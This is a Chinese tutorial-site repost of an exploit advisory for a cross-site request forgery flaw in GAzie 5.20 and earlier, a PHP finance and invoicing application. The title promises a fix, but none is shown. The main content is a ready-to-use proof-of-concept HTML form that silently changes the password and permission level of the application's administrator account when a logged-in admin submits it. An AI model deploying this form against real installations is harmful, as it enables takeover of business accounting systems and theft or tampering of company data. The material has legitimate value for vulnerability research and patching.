网站地图    收藏   

主页 > 后端 > 网站安全 >

GAzie <= 5.20跨站请求伪造及修复 - 网站安全 - 自

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] 标题:GAzie = 5.20 Cross Site Request Forgery========================================作者: giudinvx www.2cto.com giudinvx[at]gmail[dot]com网站: http://www.giudinvx.altervista.org/----......

标题:GAzie <= 5.20 Cross Site Request Forgery
========================================
作者: giudinvx www.2cto.com   <giudinvx[at]gmail[dot]com>
网站: http://www.giudinvx.altervista.org/
--------------------------------------------------------
@程序信息:
Multicompany finance application written in PHP using a MySql
database backend for small to medium enterprise. It lets you
write invoices, manage stock, manage orders , accounting, etc.
Send tax receipt to electronic cash register.
@Version 5.20 http://sourceforge.net/projects/gazie/
--------------------------------------------------------
==============[[ -测试代码- ]]==============
<form enctype="multipart/form-data"
action="[ www.2cto.com ]/modules/config/admin_utente.php?Login=amministratore&Update"
method="POST">
<input type="hidden" name="Login" value="amministratore">
<input type="hidden" value="" name="Update">
<input type="text" value="Surname " name="Cognome" title="Cognome">
<input type="text" value="Name " name="Nome" title="Nome">
<input type="text" value="italian" name="lang">
<input type="text" value="9" name="Abilit"><br/>
Password
<input type="password" value="" name="Password"><br/><!-- at least
eight alphanumeric characters -->
Repeat password
<input type="password" value="" name="confpass"><br/>
<input type="submit" value="START THE GAME" name="Submit">
</form>

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论